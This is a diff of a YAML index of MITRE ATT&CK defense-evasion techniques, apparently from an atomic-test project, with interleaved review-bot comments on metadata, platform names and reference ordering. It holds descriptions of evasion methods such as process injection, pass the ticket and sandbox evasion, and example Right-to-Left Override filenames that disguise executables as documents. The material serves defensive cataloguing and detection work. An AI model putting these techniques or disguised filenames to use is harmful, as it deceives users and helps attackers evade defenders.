x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6504,10 +6627,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6565,7 +6687,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6607,7 +6728,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6666,41 +6787,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6709,20 +6799,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
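Review bot: `x_mitre_permissions_required` with `- User` is removed near the top of this hunk and, unlike every other field of the old T1578.003 block, is not re-added in the rebuilt block, while other techniques in this patch (T1207, T1218.008, T1055.013, T1574.005) keep their `x_mitre_permissions_required` list; confirm the drop reflects the upstream object rather than a regeneration artifact. Note also that the `Mandiant M-Trends 2020` reference URL changes from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to a mandiant.com PDF, a content change that is easy to miss inside what otherwise reads as a reorder.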
@@ -6752,7 +6872,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6787,8 +6907,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6879,12 +6997,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6892,19 +7009,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
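Review bot: the rewritten T1562.007 description ends with a trailing space before the closing quote (`or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), which a double-quoted YAML scalar preserves as part of the string; trim it if the generator is under your control. The unchanged detection text (`Monitor cloud logs for modification or creation of new security groups or firewall rules.`) already covers the newly added case of an adversary creating new security groups outright, so the detection guidance needs no matching update.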
@@ -6913,7 +7036,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6936,9 +7059,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6971,7 +7093,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -6990,8 +7112,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -7022,7 +7142,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7052,12 +7172,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7083,9 +7201,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
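Review bot: the platform list for T1070 at L35043–L35046 replaces `Office 365` and `Google Workspace` with the single value `Office Suite`, alongside the version bump to 2.2. Anything that builds per-platform indexes from `x_mitre_platforms` needs to know the new name, and an index still keyed on the two old names would silently lose this technique; T1070 carries `atomic_tests: []` (L35060) so no test rows are affected here, but the platform mapping should be checked for techniques that do have tests.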
@@ -7116,14 +7233,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7143,6 +7259,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
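Review bot: `x_mitre_deprecated: false` is added explicitly at L35072 (and `revoked: false` at L35087 in the following hunk), but no such keys appear in the T1070 hunks above. If index generation filters on these flags, it must treat a missing key as not deprecated and not revoked rather than as an error, because this diff leaves the file with both representations side by side.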
@@ -7150,7 +7267,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7166,34 +7282,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
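Review bot: the only content change among the references at L35092–L35123 is the GentilKiwi entry, which moves from the direct blog URL to a web.archive.org snapshot with a September 2024 retrieved date (L35108–L35111); the other three references are the same text in a different order, and `x_mitre_modified_by_ref` is likewise removed at L35079 only to be re-added at L35129. Emitting keys and reference lists in a stable order in the generator would shrink hunks like this one to the lines that actually changed.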
T1036.004:
@@ -7259,7 +7376,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7298,7 +7414,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7347,8 +7463,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7399,7 +7513,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7420,7 +7534,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7487,7 +7600,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7510,7 +7622,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7531,8 +7643,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7593,11 +7703,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7662,7 +7771,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests:
- name: Build Image On Host
@@ -7723,7 +7831,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7767,8 +7875,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7824,7 +7930,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7848,7 +7954,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7939,40 +8044,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7984,6 +8060,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7994,8 +8074,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -8005,9 +8091,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
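Review bot: the Deloitte Environment Awareness URL at L35352 now ends in `/edit` where the removed entry at L35288 did not; for a Google Drive link `/edit` is the editor view, so confirm this is the value carried by the upstream object and that it still opens for a reader without edit rights. The same `/edit` URL appears again for T1497.002 at L35663.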
@@ -8060,7 +8165,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8098,68 +8203,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
